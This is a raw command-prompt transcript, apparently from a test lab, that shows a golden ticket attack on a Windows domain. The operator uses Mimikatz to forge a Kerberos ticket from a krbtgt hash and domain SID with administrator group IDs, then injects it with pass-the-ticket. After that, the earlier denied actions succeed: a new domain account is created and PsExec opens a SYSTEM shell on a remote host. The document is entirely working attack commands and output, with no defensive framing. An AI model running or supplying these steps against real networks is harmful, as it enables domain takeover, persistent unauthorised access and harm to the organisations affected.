Mimikatz Golden Ticket
C:\Temp>whoami /USER
USER INFORMATION
----------------
User Name       SID
=============== =============================================
test\domainuser S-1-5-21-3838653977-3010990090-570996099-1122
C:\Temp>PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Couldn't access WIN-8D3KWV0CV4T.TEST.LOCAL:
Access is denied.
C:\Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.
System error 5 has occurred.
Access is denied.
C:\Temp>mimikatz
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Mar 17 2014 22:27:23)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz (oe.eo)
  '#####'    with 14 modules * * */
mimikatz # kerberos::golden /admin:Guest /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:ticket.krb /id:500 /groups:513,512,520,518,519
Admin : Guest
Domain : TEST.LOCAL
SID : S-1-5-21-3838653977-3010990090-570996099
User Id : 500
Groups Id : *513 512 520 518 519
krbtgt : c1e209654807223d8cb17376fcb70e53
-> Ticket : ticket.krb
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::ptt ticket.krb
Ticket 'ticket.krb' successfully submitted for current session
mimikatz # exit
Bye!
C:\Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.
The command completed successfully.
C:\Temp>PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>